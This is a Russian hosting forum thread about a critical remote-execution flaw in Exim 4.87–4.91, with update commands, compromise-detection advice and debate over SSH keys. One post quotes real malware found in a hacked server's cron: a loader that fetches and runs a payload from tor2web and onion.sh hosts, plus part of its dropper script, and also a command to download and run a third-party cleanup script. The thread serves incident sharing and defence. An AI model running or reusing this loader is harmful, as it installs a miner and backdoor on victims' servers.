Форум Сайтостроение Безопасность

Уязвимость очень высокого уровня в exim

123
edogs software
На сайте с 15.12.2005
Offline
775
edogs software
#11

С директадмином на центос забавнее.

yum update exim ничего не видит.

нужно

cd /usr/local/directadmin/custombuild

./build update_script

./build exim

Разработка крупных и средних проектов. Можно с криптой. Разумные цены. Хорошее качество. Адекватный подход. Продаем lenovo legion в спб, дешевле магазинов, новые, запечатанные. Есть разные. skype: edogssoft
L
На сайте с 25.12.2013
Offline
316
Lastwarrior
#12

Как быстро проверить успели напихать вирусни или нет?

Недорогой, надежный и отзывчивый VPS хостинг ( https://bit.ly/3eXUnNN ) Проверенная пуш партнерка с ежедневными выплатами ( https://vk.cc/9wLSrL)
Андрей
На сайте с 30.09.2009
Offline
482
Андрей
#13

Lastwarrior, смотрите крон -задания - там наглядно видно.

EuroHoster.org ( https://eurohoster.org/ru/ ) - территория быстрых серверов. Выделенные серверы, VPS, SSL, домены и VPN.
suffix
На сайте с 26.08.2010
Offline
325
suffix
#14
WapGraf:
Lastwarrior, смотрите крон -задания - там наглядно видно.

Вы уверены что только одна группа злоумышленников (та что всю систему засоряет и действительно по крон заданиям засекается) действует ?

Те кто поумнее - просто оставили себе маленькую калитку на сервер (например свой ключ ssh добавили) и сидят себе тихо до поры.

Клуб любителей хрюш (https://www.babai.ru)
Hetzner начал выгонять хостеров Аргументы почему не нужно CMS для потрала с
Андрей
На сайте с 30.09.2009
Offline
482
Андрей
#15

suffix, конечно что не уверен. Но пока другой информации в сети не встречал.

А ключи и в этом случае оставлены.

Mik Foxi
На сайте с 02.03.2011
Offline
1076
Mik Foxi
#16
WapGraf:
suffix, конечно что не уверен. Но пока другой информации в сети не встречал.
А ключи и в этом случае оставлены.

Поэтому ключи зло, надо на пароли переходить 🍿 и запрещать логин по ключам.

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ + партнерка, до 40$ с продажи.
suffix
На сайте с 26.08.2010
Offline
325
suffix
#17
foxi:
Поэтому ключи зло, надо на пароли переходить 🍿 и запрещать логин по ключам.

Предпраздничный день как и в пятницу включает режим тролля :) ?

G-and-Y
На сайте с 29.06.2013
Offline
156
G-and-Y
#18
kreat0r:
Я правильно понимаю, что если у меня exim 4.84, то я могу спать спокойно?

Ошибка была найдена в версиях Exim 4.87 до 4.91 (включительно)

Походу да, у меня тоже Exim version 4.84_2

Абузо-устойчивые впс в Нидерландах от 5$/мес (https://cp.inferno.name/aff.php?aff=2991)
K0
На сайте с 16.05.2012
Offline
92
kreat0r
#19

Вчера никто не ответил и я решил обновиться от греха. По совету с хабра, версия 4.92 на Centos нашлась в epel-testing.

И да, следов взлома не нашёл. Сверил со старыми бэкапами.

Diman777
На сайте с 19.05.2013
Offline
54
Diman777
#20
Lastwarrior:
Как быстро проверить успели напихать вирусни или нет?

10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 https://prnt.sc/nzqmhf скрин 2 https://prnt.sc/nzq1ta

Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND

10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]

   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7

29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld

в кроне такой код был 

tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил 

wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh

и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

#!/bin/bash



SPOOLDIR=/var/spool/exim



cd $SPOOLDIR/db

for a in retry misc wait-* callout ratelimit; do

    [ -r "$a" ] || continue

    [ "${a%%.lockfile}" = "$a" ] || continue

    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null

done

или такой 

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST="https://an7kmd2wp4xo7hpr"

TOR1=".tor2web.su/"

TOR2=".tor2web.io/"

TOR3=".onion.sh/"

RPATH1='src/ldm'

#LPATH="${HOME-/tmp}/.cache/"

TIMEOUT="75"

CTIMEOUT="22"

COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "

WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "

tbin=$(command -v passwd); bpath=$(dirname "${tbin}")

curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi

wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi

#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '

CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '

LBIN8="kthrotlds"

null=' >/dev/null 2>&1'

sudoer=1

sudo=''

if [ "$(whoami)" != "root" ]; then

    sudo="sudo "

    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }

.................Не помещается ))...............

Может кому пригодится.

Надежные VPS/VDS, выделенные серверы и хостинг на ssd дисках, Европейское качество - Fornex Hosting ( https://fornex.com/c/ffftni/ ) ------------------------- Мой блог ( https://kdv.su/ )
CPA сеть AdmitAd.com | Трафик с яндекса: какой Упал доход
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий